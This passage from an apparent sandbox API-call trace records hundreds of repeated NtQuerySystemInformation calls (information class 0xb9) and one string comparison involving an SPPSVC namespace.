(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc70, Length=0x28, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb90, Length=0x20, ResultLength=0x0) [0228.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc50, Length=0x20, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.639] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.643] NtQuerySystemInformation 